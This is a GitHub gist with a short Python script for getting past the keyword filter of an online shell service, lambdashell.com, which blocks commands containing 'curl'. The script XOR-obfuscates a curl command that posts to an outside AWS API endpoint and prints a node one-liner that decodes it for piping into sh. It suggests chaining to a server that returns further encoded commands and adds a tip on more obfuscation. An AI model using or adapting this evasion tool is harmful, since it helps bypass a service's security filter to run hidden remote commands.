http://www.lambdashell.com/ uses `command.includes('curl')` to blacklist curl, such a check can be bypassed by piping the output of this script into sh
from random import choices, seed | |
from sys import argv | |
payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev''' | |
seed(argv[1]) | |
obfuscation_key = choices(range(256), k=len(payload)) | |
obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)] | |
print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment